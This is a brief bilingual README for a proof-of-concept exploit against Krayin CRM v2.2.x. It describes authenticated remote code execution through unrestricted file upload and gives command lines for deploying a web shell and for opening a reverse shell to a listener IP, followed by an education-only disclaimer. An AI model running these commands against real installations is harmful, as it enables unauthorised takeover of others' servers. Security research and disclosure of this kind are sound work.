
Proof-of-concept exploit for authenticated remote code execution in Krayin CRM v2.2.x via unrestricted file upload, supporting web shell and reverse shell payloads.
Krayin CRM v2.2.x의 심각한 취약점에 대한 PoC 스크립트로, 제한 없는 파일 업로드를 통해 인증된 RCE를 허용합니다.
# Web shell
python3 exploit.py -u http://target.com -e [email protected] -p password123
# Reverse shell
python3 exploit.py -u http://target.com -e [email protected] -p password123 -l 10.10.10.10 -P 4444
교육 목적으로만 사용하십시오.